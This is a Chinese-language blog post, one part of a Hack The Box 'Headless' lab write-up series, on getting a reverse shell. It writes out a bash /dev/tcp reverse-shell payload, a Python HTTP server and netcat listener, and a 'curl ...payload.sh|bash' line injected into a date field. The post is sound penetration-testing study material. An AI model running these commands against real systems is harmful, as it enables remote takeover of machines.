iT邦幫忙

2024 iThome 鐵人賽

DAY 14
0
Security

HTB_Headless系列 第 14

[Day 10]HTB_Headless(Reverse Shell_01)

  • 分享至 

  • xImage
  •  

HTB練習紀錄 — Headless

  • Reverse Shell
  • 前置作業確認

以下是簡單的步驟來使用 Reverse Shell

  1. 建立 Payload.sh
  2. 建立HTTP 伺服器
  3. 設置接收端(Listener)
  4. 注入和執行 Reverse Shell

Day 9詳細介紹Headless Hack The Box (HTB) Write-Up建立 Payload.sh 的技術細節。
本章將繼續往下說明


Reverse Shell

1. 建立Payload.sh

詳情參照Day 9,建立好的檔案會在以下檔案路徑 /home/kali/payload.sh

/bin/bash -c 'exec bash -i >& /dev/tcp/[your_IP]/1111 0>&1'

https://ithelp.ithome.com.tw/upload/images/20240821/20168534ZoynbOP1Tb.png

2. 建立HTTP 伺服器

建立HTTP 伺服器,存放payload.sh並讓受害主機連線

python3 -m http.server 8001

https://ithelp.ithome.com.tw/upload/images/20240819/20168534Ug3hKIOkZa.png

3. 設置接收端(Listener)

設置一個監聽端(Listener)接收來自 Payload 的連接。

nc -nvlp 1111

https://ithelp.ithome.com.tw/upload/images/20240819/20168534dYSiW1wuBY.png

nc: Netcat 的簡寫,用於讀取和寫入網絡連接。

-n: 禁用 DNS 查詢。告訴 Netcat 直接使用 IP 地址,避免 DNS 查詢提高效率。

-v: 啟用詳細模式(verbose mode)。輸出更多的信息,如連接建立過程、連接狀態等。

-l: 啟用監聽模式(listen mode)。將接收和處理來自客戶端的數據。

-p 1111: 指定要監聽的端口號。指定 Netcat 在端口 1111 上監聽來自客戶端的連接。

4. 注入和執行 Reverse Shell

建立 Reverse Shell

  1. 替換Cookie(可參考[Day 6])
  2. 執行payload的程式碼
curl http://[your_IP]:8001/payload.sh|bash

https://ithelp.ithome.com.tw/upload/images/20240819/20168534v7AIqw5fqw.png

成功連線受害主機!!!

https://ithelp.ithome.com.tw/upload/images/20240819/20168534kaTP5HLtug.png

有希好帥真不愧是你~


前置作業確認

如果連線失敗,可以參考以下過程

  • HTTP 伺服器、Listener、Repeater

https://ithelp.ithome.com.tw/upload/images/20240819/20168534KBDuPWY06v.png

  • payload.sh

https://ithelp.ithome.com.tw/upload/images/20240819/20168534fJCPWHbx0y.png

  • 確認payload.sh是否成功下載到受害者主機

https://ithelp.ithome.com.tw/upload/images/20240819/20168534MGlGcScM5Q.png

  • 注意下列程式碼沒有換行,最後也不能換行
date=2023-09-15;curl http://10.10.14.4:8001/payload.sh|bash

https://ithelp.ithome.com.tw/upload/images/20240821/20168534Ybzgx8EZ2l.png


今日提問

  1. payload.sh 可以更換路徑嗎? (當前路徑: /home/kali/payload.sh)
  2. curl http://[your_IP]:8001/payload.sh|bash 請問這段程式碼會在受害者主機還是攻擊者主機進行執行?
  3. 為何python3建立的http會有/home/kali/ 路徑底下的所有檔案?

參考來源:

  1. HTB_Headless
    Headless Hack The Box (HTB) Write-Up

上一篇
[問答04]竊取Cookie
下一篇
[Day 11]HTB_Headless(Reverse Shell_02)
系列文
HTB_Headless30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言